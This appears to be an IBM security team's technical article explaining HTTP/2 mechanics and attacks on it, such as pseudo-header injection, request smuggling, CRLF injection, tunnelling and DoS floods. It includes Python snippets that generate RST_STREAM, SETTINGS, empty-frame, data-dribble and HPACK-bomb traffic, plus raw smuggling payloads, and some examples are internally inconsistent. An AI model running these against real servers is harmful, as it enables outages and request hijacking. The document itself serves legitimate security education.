
Authors
Pranali Phadtare, Soummya Kulkarni, Shruthi Shunmugom M

About Us
IBM PTC is a proficient internal security test team responsible for vulnerability assessment and ethical hacking of web applications, mobile applications, and infrastructure.

Abstract

HTTP/2 is an upgraded version of the HTTP/1.1 protocol. It provides considerable performance refinements by addressing the prominent issues with HTTP/1.1. These refinements, however, seem to have had incidental consequences for security. This article elucidates the main functionality of HTTP/2 and explains web application vulnerabilities related to it, such as denial-of-service attacks and downgrading vulnerabilities.

Introduction to HTTP Protocol

HyperText Transfer Protocol (HTTP) is a communication protocol used to connect to web servers on the Internet or on a local network. The primary function of HTTP is to establish a connection with the server and send HTML pages back to the user's browser. It is also used to download data from the server, either to the browser or to any requesting application that uses HTTP.

HTTP is an application layer protocol and works on a client-server model.

The basic working of HTTP is as follows (a minimal sketch in Python follows the list):
1. The client establishes a TCP connection with the server.
2. The client sends an HTTP request to the server describing the data it requires.
3. The server responds to the client with a status code and data in the form of a response.
4. The client closes the TCP connection once all the required data is received.
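This request/response cycle can be sketched with nothing more than Python's standard library. This is a minimal sketch, assuming a reachable placeholder host (example.com); real clients also handle redirects, chunked bodies, and keep-alive:

import socket

# 1. The client establishes a TCP connection with the server.
with socket.create_connection(("example.com", 80)) as sock:
    # 2. The client sends an HTTP request describing the data it requires.
    request = (
        "GET /index.html HTTP/1.1\r\n"
        "Host: example.com\r\n"
        "Connection: close\r\n\r\n"
    )
    sock.sendall(request.encode("ascii"))
    # 3. The server responds with a status code and data.
    response = b""
    while chunk := sock.recv(4096):
        response += chunk
    print(response.split(b"\r\n", 1)[0])  # e.g. b'HTTP/1.1 200 OK'
# 4. The TCP connection is closed on leaving the 'with' block.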

So far, there have been several versions of HTTP: HTTP/0.9, HTTP/1.0, HTTP/1.1, and HTTP/2. Each successive version improved how requests and responses are communicated.

HTTP/2 is a major revision of the HTTP protocol. It was officially released in 2015, following the release of HTTP/1.1 in 1997. The goal behind this version was to make applications simpler, more robust, and faster. A newer version of the protocol was needed because, over the years, web pages and web applications had become more complex: scripts grew in size and more visual media was displayed. The resulting increase in data transfer led to a greater number of requests and responses, creating complexity and overhead for HTTP/1.1. Hence, HTTP/2 was introduced with the enhanced features that are widely used today.

Evolution of HTTP/2 from HTTP/1.1


HTTP/1.1 is a basic client-server architecture built on a TCP connection, in which the client sends a request and waits for its response. The client establishes a TCP connection with the server, a stateful two-way communication channel, and then sends a request; for example, the client requests an index.html page, the request is processed at the server, and index.html is returned to the client.

Until this processing completes on the server side, no new requests can be sent. This underutilizes the TCP connection, which is capable of handling multiple requests at a time. To load a complete web page, we might need many supporting files apart from the main HTML page: JavaScript files, CSS files, image files, etc.

So, for a web page to load completely over HTTP/1.1, each request must be sent individually, and the response for each is retrieved one by one. The wait time obviously impacts the speed at which the web page loads. To mitigate this, modern browsers open six TCP connections at once when the server is configured to use HTTP/1.1. The moment a user requests a web page, which, as mentioned earlier, needs many files along with the main page, the browser opens six TCP connections and sends one request over each. This design is still slow: if there are more than six files, there is a wait time again, since a request for the seventh file can only be initiated once one of the six TCP connections is freed. It is also expensive, as more memory is consumed.

To overcome the above limitations of HTTP/1.1, HTTP/2 was introduced. The main goals of HTTP/2 are to improve latency through multiplexing, to minimize protocol overhead via efficient compression of HTTP header fields, and to support request prioritization and server push.

The HTTP/2 protocol maintains the basic HTTP protocol skeleton. The enhancements lie only in how the data is framed and transmitted between the client and the server, ensuring that network resources are used efficiently. The key features of the HTTP/2 protocol are explained briefly below.

1. Introduction of a new binary framing layer and Multiplexing

This is the most important enhancement in the HTTP/2 protocol. The binary framing layer facilitates the encapsulation and transfer of data between the client and the server. The HTTP/1.x protocol was a newline-delimited plaintext protocol, whereas in HTTP/2 the data to be transmitted is split into messages and frames encoded in binary format.

The full request from the client is first broken down into multiple frames. A frame can be a headers frame, a data (payload) frame, etc., and each frame carries a stream identifier in its header. One or more frames together form a 'message'. A message is treated as a logical HTTP message, i.e., a request or a response, consisting of one or more frames. In this way, the data is transformed and sent over the TCP connection; when the server returns data for each of these messages, the client uses the stream identifiers to reassemble the data correctly and present it to the end user.
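The 9-byte frame header that makes this framing possible is small enough to build by hand. The sketch below packs the layout defined in RFC 7540 (24-bit payload length, 8-bit type, 8-bit flags, 31-bit stream identifier); the values are illustrative.

import struct

def frame_header(length: int, frame_type: int, flags: int, stream_id: int) -> bytes:
    # 24-bit length: pack as 4 bytes, then drop the leading byte.
    return (
        struct.pack(">I", length)[1:]
        + struct.pack(">BB", frame_type, flags)
        + struct.pack(">I", stream_id & 0x7FFFFFFF)  # high bit is reserved
    )

# A HEADERS frame (type 0x1) with END_HEADERS (flag 0x4) on stream 1,
# announcing a 42-byte header block:
print(frame_header(42, 0x1, 0x4, 1).hex())  # 00002a010400000001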

The underutilization of the HTTP/1.1 protocol was overcome in HTTP/2 by


the introduction of full request and response multiplexing. Multiplexing
allows transfer or delivery of multiple requests and responses in parallel in
a single TCP connection. This enabled a smooth flow of requests and
responses without any wait time or blocking. All these enhancements
ultimately resulted in a lower page load time by reducing latency and
utilizing the network capacity to its best. As a result of all these
enhancements, multiple TCP connections are not required; only a single
TCP connection per origin completely serves the purpose, thereby
improving the network performance.
Source: https://dl.acm.org/doi/fullHtml/10.1145/2542661.2555617

2. Stream prioritization

HTTP messages are split across various frames, and these frames are transmitted as multiplexed streams. With many streams and frames exchanged between client and server, performance has to be managed. To make this possible, HTTP/2 assigns each stream a weight and a dependency: streams are assigned an integer weight, and each stream may be declared dependent on another stream. From these weights and dependencies, the client constructs a prioritization tree expressing how it would prefer to receive responses. The server uses the same information to prioritize streams when allocating CPU, memory, and other resources. This feature improves browsing performance when many resources with different dependencies and weights are in flight.
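A stream's weight and dependency travel in the PRIORITY frame. Below is a sketch of its 5-byte payload as specified in RFC 7540: an exclusive-dependency bit, a 31-bit parent stream ID, and the weight stored as (weight - 1). The stream numbers are illustrative.

import struct

def priority_payload(depends_on: int, weight: int, exclusive: bool = False) -> bytes:
    dep = depends_on & 0x7FFFFFFF
    if exclusive:
        dep |= 0x80000000          # set the exclusive bit
    return struct.pack(">IB", dep, weight - 1)  # weight is 1..256 on the wire

# Declare stream 5 dependent on stream 3 with weight 200:
print(priority_payload(3, 200).hex())  # 00000003c7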

Source: https://web-dev.imgix.net/image/C47gYyWYVMMhDmtYSLOWazuyePF2/ydLldhPadjknvvrUiCai.svg
3. Flow control

A sender can overwhelm a receiver by transmitting data faster than the receiver wants or is able to process it. For example, a user watching a video causes the client to request that data at high priority; if the user then pauses the video, the client wants to pause delivery of the now-unneeded data from the server rather than buffer it. The flow control mechanism prevents the sender from overwhelming the receiver with data it does not want or cannot process. Since HTTP/2 multiplexes streams over a single TCP connection, it allows client and server to implement flow control at both the stream and the connection level. Flow control has a direction, with a window size chosen by the receiver for each stream and for the connection as a whole. SETTINGS frames are exchanged between client and server when the HTTP/2 connection is established; they allow each side to set the size of the flow control window in both directions. HTTP/2 does not prescribe a specific algorithm for implementing flow control. An example of this feature: a user fetches an image via the browser; application layer flow control lets the browser fetch a preview of the image, display it, reduce that stream's window to zero so that high-priority fetches can proceed, and resume the fetch once those complete.
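Here is a sketch of those two knobs using the third-party h2 library (python-hyper), shown without any network I/O; the stream ID, path, and window sizes are illustrative assumptions.

import h2.connection
import h2.settings

conn = h2.connection.H2Connection()
conn.initiate_connection()

# Advertise a small per-stream receive window in our SETTINGS frame.
conn.update_settings({h2.settings.SettingCodes.INITIAL_WINDOW_SIZE: 1024})

# Open stream 1 with a request.
conn.send_headers(1, [
    (":method", "GET"), (":path", "/image.png"),
    (":authority", "example.com"), (":scheme", "https"),
], end_stream=True)

# After consuming received DATA, reopen the stream's window; this emits
# a WINDOW_UPDATE frame. Simply never sending it keeps the window shut
# and pauses delivery on that stream.
conn.increment_flow_control_window(1024, stream_id=1)

wire = conn.data_to_send()  # preface + SETTINGS + HEADERS + WINDOW_UPDATE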

4. Header compression

Every HTTP request or response contains HTTP headers that describe additional context and metadata about the message. In HTTP/1.1, these headers are sent as plain text, and a considerable number of bytes is consumed transferring them between the client and the server. HTTP/2 reduces this burden on the network through a mechanism called header compression, implemented by an algorithm called HPACK. The compression algorithm focuses on two things. First, it encodes the header fields using a static Huffman code, which reduces the transfer size; each header field is encoded individually. Second, an indexed list of previously seen header fields is maintained and used as a reference to encode previously transmitted header fields in subsequent messages. The HPACK compression method consists of a static and a dynamic table: the static table holds a list of headers commonly used across requests, while the dynamic table is updated with the header fields transferred within a particular connection. As a result, the size of each request is reduced by using static Huffman coding for newly transmitted headers and by substituting indexes for values already present in the static or dynamic tables on both the client and the server side.
HPACK

HPACK is the header compression algorithm used by HTTP/2. It is applied to both requests and responses. The purpose of the algorithm is to compress header data as much as possible while remaining computationally cheaper than general-purpose compression techniques. It uses three methods of compression:

1. Static dictionary: contains header fields with predefined values; it holds 61 entries.
2. Dynamic dictionary: contains unique headers that were observed during the connection. It has a limited size, so when new entries are added, old ones are evicted.
3. Huffman encoding: used to encode string literals, i.e., header names and values.

During a connection, HPACK inspects the headers because it encodes and compresses each header name and value.

If the header name:value pair is present in the static dictionary, HPACK simply refers to that entry's index, which takes barely 1 or 2 bytes. If a new header is encountered, it is added to the dynamic dictionary; if it was previously encountered, HPACK refers to the dynamic dictionary and encodes only the header value, which again takes only 1 or 2 bytes, thus compressing headers as much as possible.
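This lookup behaviour is easy to observe with the third-party hpack library (the python-hyper HPACK codec); the custom header below is an illustrative assumption.

from hpack import Encoder, Decoder

enc = Encoder()
headers = [(":method", "GET"), (":path", "/index.html"), ("x-custom", "abc")]

first = enc.encode(headers)   # x-custom is new: sent literally, then indexed
second = enc.encode(headers)  # now every field is a 1-2 byte index reference
print(len(first), len(second))  # the second block is markedly smaller

dec = Decoder()
print(dec.decode(first))      # round-trips to the original header list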

Server push

It is well known that loading a complete web application requires multiple files. For instance, the main HTML page would need several supporting files served along with it. Instead of the client requesting each resource separately, server push enables the server to return all the files required for the page to load in response to a single client request; the client doesn't have to ask for each one individually.
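Below is a sketch of the push flow with the third-party h2 library, wiring a client and a server connection together in memory instead of over a socket; the paths, authority, and stream numbers are illustrative assumptions.

import h2.config
import h2.connection

client = h2.connection.H2Connection()
server = h2.connection.H2Connection(
    config=h2.config.H2Configuration(client_side=False)
)
client.initiate_connection()
server.initiate_connection()
server.receive_data(client.data_to_send())  # client preface + SETTINGS
client.receive_data(server.data_to_send())

# The client asks for the main page on stream 1.
client.send_headers(1, [
    (":method", "GET"), (":path", "/index.html"),
    (":authority", "example.com"), (":scheme", "https"),
], end_stream=True)
server.receive_data(client.data_to_send())

# The server promises /style.css before the client asks for it.
# Server-initiated streams are even-numbered.
server.push_stream(1, 2, [
    (":method", "GET"), (":path", "/style.css"),
    (":authority", "example.com"), (":scheme", "https"),
])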
Source: https://twitter.com/apnic/status/1255699646866997255

Vulnerabilities with HTTP/2

In this section, we shall cover different attack surfaces and vulnerabilities identified within the enhancements of HTTP/2.

URL Prefix Injection

In the HTTP/1.x protocol, the request line and the status line carried the request method, target URI, and response status code. For example: GET /index.html HTTP/1.1.

With the introduction of HTTP/2, pseudo-headers replaced the request and status lines. Pseudo-headers convey information about the request message. There are five pseudo-headers in HTTP/2, namely :method, :path, :authority, :scheme, and :status. These are not regular HTTP headers, but a replacement for the request and status lines of HTTP/1.x. The listing below shows the header representation of a sample HTTP/2 request.

Each of these pseudo-headers serves a different purpose. One of them is the :scheme header, which represents the scheme of the target URI. It normally takes values like http or https, but it can also take arbitrary values, for example, a full URL. If proper validation is not in place, this can lead to redirection and cache poisoning.

Request headers:

:method GET

:path /index.html

:authority 9.199.145.174:8443

:scheme http://attacker.com/hack?

Response:

HTTP/1.1 301 Moved Permanently
Location: http://attacker.com/hack?://9.199.145.174:8443/index.html

A few web applications use the scheme to build the URL to which the request is routed, creating a potential SSRF vulnerability.

Header Name Splitting

The Host header of HTTP/1.x is replaced by the :authority pseudo-header in HTTP/2:

:method POST

:path /index.html

:authority test.com

:scheme https

user-agent burp

x=123&y=4

Some servers do not allow newlines in header names but do allow colons. This can be used to desynchronize HTTP/2 downgrades and to supply the server with multiple hosts. The host information in an HTTP/2 request is written as :authority <host name>, and we can smuggle an additional host header such as host: test.com:443. HTTP/2 treats this as just another header, but after downgrading it can result in host header injection:

:method GET

:path /

:authority example.com

host: test.com:443

GET / HTTP/1.1

Host: example.com

Host: test.com:443

Ambiguity and HTTP/2

HTTP/1.x allows the addition of multiple headers, enabling attacks like host header injection, but there was no way to supply multiple paths. In HTTP/2, as described earlier, the request line is replaced by pseudo-headers like :method, :path, etc. This can be leveraged to supply multiple paths. Some servers accept multiple paths and are inconsistent about which one they process. We can supply multiple paths in the following way, creating an ambiguity:

:method GET

:path /some-path

:path /different-path

:authority test.com

This way, servers may disagree about which path to process, opening the door to various vulnerabilities. A sketch of how such a request can be crafted follows.
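Compliant client libraries refuse to emit duplicate pseudo-headers, so an ambiguous request has to be assembled at the frame level. Below is a sketch using the third-party hpack and hyperframe packages; the target and paths are illustrative, and the resulting bytes would be sent after the connection preface on an established connection.

from hpack import Encoder
from hyperframe.frame import HeadersFrame

block = Encoder().encode([
    (":method", "GET"),
    (":path", "/some-path"),
    (":path", "/different-path"),   # duplicate pseudo-header
    (":authority", "test.com"),
    (":scheme", "https"),
])

frame = HeadersFrame(stream_id=1)
frame.data = block
frame.flags.add("END_HEADERS")
frame.flags.add("END_STREAM")
wire = frame.serialize()  # raw HEADERS frame carrying both paths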

Request Line Injection


The request line contains the HTTP request method, the request URL's path, and the HTTP version. The request method tells the server what should be done with the requested resource; there are various methods, like GET, POST, PUT, etc. The path element of the request URL identifies the resource target and the back-end connections for the requested resource. Finally, the HTTP version indicates the version expected in the response.

If the front end permits spaces in :method, request line injection becomes possible.

Since the proxy permits spaces in :method, 'GET /admin HTTP/1.1' is treated as part of :method, and '/fakepath' is treated as the :path attribute. If the back-end server accepts junk in the request line, we can bypass block rules such as the following:

<ProxyMatch "/admin">
Deny from all

:method GET /admin HTTP/1.1

:path /fakepath

:authority test.com

GET /admin HTTP/1.1 /fakepath HTTP/1.1
Host: internal-server

Header Tampering Wrap

Line folding is a legacy HTTP/1 feature whereby a header value can be continued onto the next line: \r\n followed by a space causes the subsequent data to be 'folded' into the preceding header value.

If an application with an HTTP/2 front end accepts a space before a header name, and the back end accepts line folding, we can tamper with headers as follows:

GET /admin HTTP/1.1

Host: sample.com

Request-Id: 1234

Poison: x

User-agent: burp

...

HTTP/1.1 200 OK

Content-Type: text/html

Content-Length: 2500

Request-Id: 1234 poison: x


Here :method is set as <GET / HTTP/1.1> along with Host header and
Request Id set as <redacted.net> and <1-6022d2c4b-> . Since the
application backend accepts folding, poison header gets folded, which
causes the response to accept poison:x as a part of Request-Id.

Denial of Service Attacks in HTTP/2

Reset Flooding

Reset flood is a type of DoS in which an attacker sends invalid requests on multiple streams to an HTTP/2 target, expecting RST_STREAM frames in return.

An invalid request can cause a peer to send RST_STREAM frames in response. A RST_STREAM frame causes the stream to become "closed", which releases the stream reservation; even as streams are reset, the connection itself remains open. Depending on the configured maximum number of RST_STREAM frames allowed per connection per minute, handling these resets can consume an unbounded amount of CPU and memory. Excess consumption of the resources eventually causes resource exhaustion, leading to denial of service.
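Here is a sketch of the traffic pattern with the third-party h2 library, shown without a socket; in a real engagement (only ever against systems you are authorized to test) the bytes from data_to_send() would be written to the TLS connection. The stream count and target are illustrative.

import h2.connection
import h2.errors

conn = h2.connection.H2Connection()
conn.initiate_connection()

for stream_id in range(1, 2001, 2):      # client streams are odd-numbered
    conn.send_headers(stream_id, [
        (":method", "GET"), (":path", "/"),
        (":authority", "example.com"), (":scheme", "https"),
    ])
    # Immediately cancel the stream, provoking server-side cleanup work.
    conn.reset_stream(stream_id, error_code=h2.errors.ErrorCodes.CANCEL)

burst = conn.data_to_send()  # a burst of HEADERS + RST_STREAM frames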

Settings Flood:

An attacker sends a stream of SETTINGS frames to the server; each SETTINGS frame requires an acknowledgment.

The SETTINGS frame does not need to maintain any state other than the current value of each setting; the value of a SETTINGS parameter is simply the last value seen by the receiver. Depending on how many SETTINGS frames per connection the configuration tolerates, the queued frames can consume excess CPU or memory, leading to denial of service.

The SETTINGS frame can also be abused to make a peer expend additional processing time, for example by pointlessly changing settings, sending multiple undefined settings, or changing the same setting multiple times in the same frame.

Limits carried in SETTINGS cannot be reduced instantaneously, which leaves an endpoint exposed to behaviour from a peer that exceeds the new limits. In particular, immediately after a connection is established, limits set by the server are not yet known to clients and can be exceeded without any obvious protocol violation.
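A sketch of the flood with the third-party h2 library: each frame queued below obliges the peer to send a separate acknowledgment. The count and the toggled setting are illustrative; as above, the output bytes would go only to a connection you are authorized to test.

import h2.connection
import h2.settings

conn = h2.connection.H2Connection()
conn.initiate_connection()

for i in range(1000):
    # Pointlessly toggle the same setting back and forth.
    conn.update_settings({
        h2.settings.SettingCodes.HEADER_TABLE_SIZE: 4096 + (i % 2),
    })

flood = conn.data_to_send()  # a long run of SETTINGS frames awaiting ACKs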

Stream Multiplexing and Reuse attack:

Stream multiplexing was introduced to carry multiple streams over a single TCP connection, reducing page load time and network bandwidth. A stream corresponds to a single request and a single response. When the client wants to send a request, it opens a new stream and assigns a stream identifier to it. The stream serves exactly one request/response exchange and cannot be used by any other request. According to the RFC, once a stream identifier has been used and closed, it cannot be reused to represent another request/response within the same connection.
Stream Reuse

When the client wants to request a page from the server, it sends request 1 by opening a new stream, Stream 1, and assigning it a stream identifier. The client sends the request over Stream 1 and the server responds on the same stream. If the client now wants to send a second request, it should open a new stream, Stream 2. In a stream reuse attack, sending request 2 over the already-used Stream 1 can lead to denial of service on the server. Research on a vulnerable version of IIS 10 has shown that reusing the same stream within the same connection led to the Blue Screen of Death.

Dependency Cycle Attack:

As described earlier, the HTTP/2 protocol splits HTTP messages into multiple frames, which are transmitted over streams; as a result, many frames are exchanged between the client and the server. During this flow, streams are assigned an integer weight and a dependency, from which a dependency graph is constructed. According to the RFC, the dependency graph should be a tree and must never contain a cycle, as a cyclic dependency graph can lead to an infinite loop and ultimately crash the server. Apart from this, the size of the graph is not limited by the specification; each server can set its own limit. If no limit on the dependency tree size is implemented, a malicious client can create a huge graph that consumes the server's entire memory. Some servers have exhibited denial of service due to the lack of these safeguards. One configuration that bounds the dependency graph is MAX_CONCURRENT_STREAMS: when the limit is reached, the server cleans up the oldest stream's memory and assigns it to the new stream.

DoS on httpd

Each stream in an HTTP/2 transmission is given a particular memory address on the server. As described above, when the MAX_CONCURRENT_STREAMS value is reached, the server cleans up that memory and assigns the addresses to new streams. If the clean-up process is flawed, it can enter a loop and eventually result in denial of service. Research has shown that servers such as nhttpd have failed to clean up memory properly, resulting in a DoS condition. For example:

There are 15 streams in a connection, and the streams are assigned memory addresses like so:

Stream 1 – address = 1046567980
Stream 2 – address = 1046567981, and so on,
up to Stream 7 – address = 1046567986.

Here, assume that Stream 1 has a dependency on Stream 2.

Now, when the server reaches the MAX_CONCURRENT_STREAMS value, it must clean up the oldest stream's address (Stream 1's) and assign it to Stream 8. Due to the flawed clean-up, the dependent stream, Stream 2, is not cleaned up, which creates a loop between Stream 8 and Stream 2.
HPACK Bomb

An HPACK bomb is a kind of DoS attack that abuses the HPACK algorithm used by HTTP/2. The attacker supplies a header field that is as large as the entire dynamic table and inserts it, so that it fills the table. The attacker then sends header blocks consisting of repeated index references to that entry. Each reference costs only a byte or two, so a very large amount of header data is compressed into a tiny request.

When the compressed data is decompressed on the server side, it expands into a very large amount of data; say, 16 KB of compressed data decompresses to 64 MB. This consumes the server's memory resources and can crash the server or make it unavailable, leading to denial of service.
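The amplification is easy to measure with the third-party hpack library. The header name and sizes below are illustrative; the entry nearly fills the default 4096-byte dynamic table, and each later reference to it costs about one byte. Note that hpack's decoder enforces a maximum decoded header-list size precisely to blunt this attack, which is why this demo stays small.

from hpack import Encoder, Decoder

enc, dec = Encoder(), Decoder()
bomb = ("x-bomb", "A" * 4000)     # entry size ~4038 bytes, just under 4096

first = enc.encode([bomb])        # ~4 KB on the wire; fills the dynamic table
dec.decode(first)                 # the decoder's table now holds the entry

flood = enc.encode([bomb] * 10)   # ten ~1-byte index references
expanded = dec.decode(flood)      # ~40 KB of decompressed header data
print(len(flood), sum(len(v) for _, v in expanded))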

Empty Frames Flood:

The HTTP/2 protocol is also vulnerable to empty frame floods. This is an attack in which a malicious client sends a large number of empty frames, i.e., frames with an empty payload and without the end-of-stream flag set. Frames that can be used for the flood include DATA, HEADERS, etc. The server tries to process these empty frames without ever reaching the end of the stream, consuming excess CPU; this eventually results in denial of service.
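Generating such frames takes a few lines with the third-party hyperframe package; the stream ID and count are illustrative, and the bytes would be written only to an established connection you are authorized to test.

from hyperframe.frame import DataFrame

def empty_data_frames(stream_id: int, count: int) -> bytes:
    out = bytearray()
    for _ in range(count):
        frame = DataFrame(stream_id)   # empty payload, END_STREAM not set
        out += frame.serialize()
    return bytes(out)

flood = empty_data_frames(1, 10_000)   # 9 bytes of frame header apiece
print(len(flood))                      # 90000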

Slow Read

An attacker crafts malicious HTTP requests that open connections between a single computer and the target server and tries to keep those connections open for as long as possible, driving up resource consumption and slowing the server's responses. This is essentially the well-known Slowloris DDoS attack. Slowloris is an application layer DDoS attack in which an attacker uses a valid HTTP method like GET or POST to open connections on the target server, then sends a vast number of such requests to slow it down, degrading the server with largely inactive connections. In the HTTP/2 variant, the attacker launches the attack using GET requests while manipulating the END_HEADERS and END_STREAM flags so that the streams never complete.

Data Dribble

In HTTP/2, data is transmitted as streams. Each stream is given a priority by assigning it a weight, and streams are transmitted and responses received accordingly: a stream with a high weight is transmitted earlier, one with a low weight later. The attacker abuses this stream-and-window feature to construct an attack: they request a large amount of data from a resource over multiple streams, then manipulate stream priority and window size to force the server to queue the data one byte at a time. The attack works as follows:

1. The attacker requests 100 MB of data from the server.
2. The data is requested as 1 MB over each of 100 streams.
3. The attacker manipulates window sizes and stream priority.
4. This forces the server to queue the data in chunks of 1 byte.
5. Processing this becomes computationally expensive for the server.
The resulting excessive memory and CPU consumption hampers the efficiency of the server. A sketch of the window manipulation follows.
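Below, a client built on the third-party h2 library advertises a 1-byte window before requesting a large resource, so the server may send only one byte per WINDOW_UPDATE. The path and target are illustrative assumptions.

import h2.connection
import h2.settings

conn = h2.connection.H2Connection()
conn.initiate_connection()

# Shrink the per-stream receive window to a single byte.
conn.update_settings({h2.settings.SettingCodes.INITIAL_WINDOW_SIZE: 1})

conn.send_headers(1, [
    (":method", "GET"), (":path", "/large-file"),
    (":authority", "example.com"), (":scheme", "https"),
], end_stream=True)

# After each 1-byte DATA frame arrives, grudgingly open one more byte:
#   conn.acknowledge_received_data(1, stream_id=1)
wire = conn.data_to_send()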

Resource Loop

In this attack, the attacker abuses the stream prioritization feature of HTTP/2. As mentioned above, streams are given a priority and transmitted accordingly. An attacker leverages this by repeatedly changing the priority of streams: many requests are created and their stream priorities are continually tampered with. The prioritization tree therefore changes continuously, driving it into a loop and causing excessive CPU consumption.

Internal Data Buffering

An attacker opens the HTTP/2 flow control window while keeping the TCP window closed, and requests an object with a huge response. At the HTTP/2 layer the server is free to send the data, but it is not allowed to write bytes onto the wire, so the requested object is buffered and cannot be delivered to the client. This builds up a queue of responses, consuming excessive memory and resources.

HTTP/2 Downgrading:

A good practice when HTTP/2 is implemented is to have an end-to-end HTTP/2 connection, but many systems do not ensure this. Most of the time, HTTP/2 is implemented on the front end while the legacy back-end systems still speak HTTP/1.x, creating a need for HTTP/2 downgrading. In HTTP/2 downgrading, the front-end HTTP/2 request is translated into an equivalent HTTP/1.x message and served to the back-end server running HTTP/1.x; the HTTP/1.x response from the back end is then converted back into an HTTP/2 equivalent before being served to the front-end client.

Below are a few of the vulnerabilities associated with HTTP/2 downgrading.

Request Smuggling:

A full HTTP request is delimited by its message length, indicated by headers like Content-Length and Transfer-Encoding, and different servers interpret the length of a request in different ways. HTTP request smuggling occurs when there is a discrepancy in how the front-end and back-end servers parse the request, and it is achieved by abusing the Content-Length and Transfer-Encoding headers. A malicious request is combined with an ordinary request body and sent to the back-end server for processing; the second, malicious request hidden in the first request's body is smuggled through and processed by the back end. Conflicting Content-Length headers can thus cause different proxy servers to interpret the request differently, resulting in request smuggling attacks.

An end-to-end HTTP/2 connection protects against request smuggling. But when HTTP/2 downgrading happens, even previously secure web applications can become vulnerable to smuggling attacks.

H2.CL Desync Vulnerability:

The HTTP/2 protocol uses its own built-in length mechanism to identify the end of an HTTP request, so a dedicated header indicating the content length is not required on an HTTP/2 connection. But when a downgrade happens, the front-end server adds a Content-Length header to the HTTP request before forwarding it to the back end. A malicious user can inject or manipulate the Content-Length header so that the back-end server treats the incoming request as two different requests. An illustrative H2.CL desync is shown below.
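This reconstruction is illustrative (the host is a placeholder): the front end trusts HTTP/2's frame lengths and forwards the whole message, while the back end trusts the injected Content-Length of 0 and treats the leftover bytes as the start of a second request.

:method POST

:path /

:authority vulnerable-website.com

content-length 0

GET /admin HTTP/1.1
Host: vulnerable-website.com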

H2.TE Desync Vulnerability:

The HTTP/2 protocol prohibits connection-specific headers. The one exception is the TE (Transfer-Encoding) header, which may only contain the value "trailers"; if any other TE value is present in an HTTP/2 request, the request should fail with a protocol error. If this header is improperly validated and the request is successfully downgraded and sent to the back end, a smuggling attack may be possible.

Such downgrading can lead to many more Desync attacks like H2.TE
request line injection, H2.TE Header injection, H2.X via request splitting
and so on.
Response queue poisoning:

This is a kind of smuggling attack in which requests are mismatched with their corresponding responses. For example, suppose there are three requests and three responses on a connection. When a smuggling attack poisons the queue, the front-end server may match Request 1 with, say, Response 3 and serve it to the user. This can have a heavy impact on front-end users, who may receive completely irrelevant responses. An attacker can exploit this to receive other users' responses and steal sensitive information like cookies, PII data, etc.

CRLF:

When a browser sends a request to a web server, the server answers with a response containing both the HTTP response headers and the actual website content, i.e., the response body. The HTTP headers and the HTML response (the website content) are separated by a specific combination of special characters, namely a carriage return and a line feed, known as CRLF for short.

HTTP/2 request splitting

HTTP response splitting is a protocol manipulation attack that occurs when a web server fails to sanitize CR and LF characters before data is included in outgoing HTTP headers. The HTTP protocol consists of requests and responses; each message consists of headers and a body, and each header line is terminated by a carriage return (\r) and a line feed (\n). A simple HTTP response looks like this:

HTTP/1.1 200 OK \r\n

Content-Encoding: gzip \r\n

Content-Type: text/html; charset=UTF-8 \r\n

Content-Length: 606 \r\n\r\n


<title>Hello World!</title>

Since the headers of an HTTP message and its body are separated by CRLF characters, an attacker can try to inject a CRLFCRLF combination, which tells the server that the headers end and the body begins, as shown below:

HTTP/1.1 302 Found

Content-Type: text/html

Location: \r\n

Content-Type: text/html \r\n\r\n

<html><h1>hacked!</h1></html>

Content-Type: text/plain

Request smuggling via CRLF injection

An HTTP request smuggling vulnerability occurs when an attacker injects essential headers into a single request. This can cause either the front-end or the back-end server to misinterpret the request boundary and keep the connection open after responding to the initial request. Each request header is followed by a carriage return (\r) and a line feed (\n). In HTTP/1, CRLF (\r\n) terminates each header, while in HTTP/2 headers are not separated using CRLF, so including CRLF inside a header value does not cause the header to be split.

HTTP request smuggling arises because the HTTP specification provides two different ways to specify where a request ends: the Content-Length header and the Transfer-Encoding header. Both headers are sent in a single request to manipulate the front-end and back-end servers. A server that honours the Transfer-Encoding header treats the message body as chunked, allowing an attacker to append a smuggled request, as in the illustrative example below.
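An illustrative CL.TE request (the host is a placeholder): the front end uses Content-Length (13 bytes, covering the "0", the CRLFs, and "SMUGGLED") and forwards everything, while the back end uses Transfer-Encoding, ends the chunked body at the zero-length chunk, and leaves SMUGGLED as the prefix of the next request.

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED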

Request Tunnelling

Request smuggling attacks are possible because multiple requests are handled over the same connection between the front end and the back end; for example, some servers reuse the connection for multiple requests originating from the same IP address or client.

Even when we can't poison the socket to interfere with other users' requests, we can still send a single request that yields two responses from the back end. This lets us hide a request and its response from the front end. This technique for bypassing front-end security measures is called request tunnelling.
In HTTP/2, each stream should contain a single request and response. If we receive an HTTP/2 response whose body appears to contain an HTTP/1 response, we can conclude that a second request was successfully tunnelled.

One application of request tunnelling is leaking internal headers: we trick the front end into appending its internal headers in a position where they become part of a body parameter on the back end.

:method POST

:path /comment

:authority vulnerable-website.com

content-type application/x-www-form-urlencoded

foo bar\r\n

Content-Length: 200\r\n

\r\n

comment=

Consider this sample request: initially, both the front end and the back end agree that it is a single request, but they can be made to disagree about where the headers end.

Front end: considers everything to be part of the headers and appends the new (internal) headers after the comment= string.

Back end: sees the \r\n\r\n sequence and considers it the end of the headers; it treats the comment= string, along with the appended internal headers, as part of the body, so the internal headers become part of the value of the comment parameter.

Blind request tunnelling

On some servers, if we successfully tunnel a request, the response to the second request appears wrapped inside the response body of the first request.

Other servers read only the number of bytes specified in the response's Content-Length header and show only the first response to the client. In that case, even though you have tunnelled a request, you will not be able to tell that tunnelling has happened.

Non-blind request tunnelling

Blind request tunnelling is hard to identify, but it can be made non-blind using the HEAD method.

Responses to HEAD requests contain a Content-Length header even though they have no body of their own; the value normally refers to the length of the resource that a GET request to the same endpoint would return. Some front-end servers read the number of bytes specified in that header, so successfully tunnelling a request through such a front end causes it to over-read and return the back end's response to the tunnelled request.

Request

:method HEAD

:path /example

:authority vulnerable-website.com

foo bar\r\n\r\nGET /tunnelled HTTP/1.1\r\nHost: vulnerable-website.com\r\nX: x

Response

:status 200

content-type text/html

content-length 131

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4286

<!DOCTYPE html>
<h1>Tunnelled</h1>
<p>This is a tunnelled response</p>

Conclusion

